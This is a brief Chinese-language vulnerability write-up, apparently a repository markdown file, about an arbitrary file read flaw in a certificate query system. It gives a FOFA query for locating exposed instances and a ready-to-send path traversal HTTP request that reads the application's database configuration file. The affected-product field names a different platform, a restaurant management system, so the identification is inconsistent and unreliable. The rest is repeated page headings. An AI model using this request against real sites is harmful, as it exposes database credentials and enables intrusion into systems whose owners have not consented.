证书查询系统存在任意文件读取漏洞

一、漏洞简介

证书查询系统存在任意文件读取漏洞

二、影响版本

餐厅数字化综合管理平台

三、资产测绘

fofa"/index/js/jquery.uls.data.js'"

四、漏洞复现

GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

更新: 2024-08-12 17:15:58
原文: https://www.yuque.com/xiaokp7/ocvun2/kw3y9u4xck897gu2

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

证书查询系统存在任意文件读取漏洞.md

证书查询系统存在任意文件读取漏洞.md

证书查询系统存在任意文件读取漏洞

一、漏洞简介

二、影响版本

三、资产测绘

四、漏洞复现

Files

证书查询系统存在任意文件读取漏洞.md

Latest commit

History

证书查询系统存在任意文件读取漏洞.md

File metadata and controls

证书查询系统存在任意文件读取漏洞

一、漏洞简介

二、影响版本

三、资产测绘

四、漏洞复现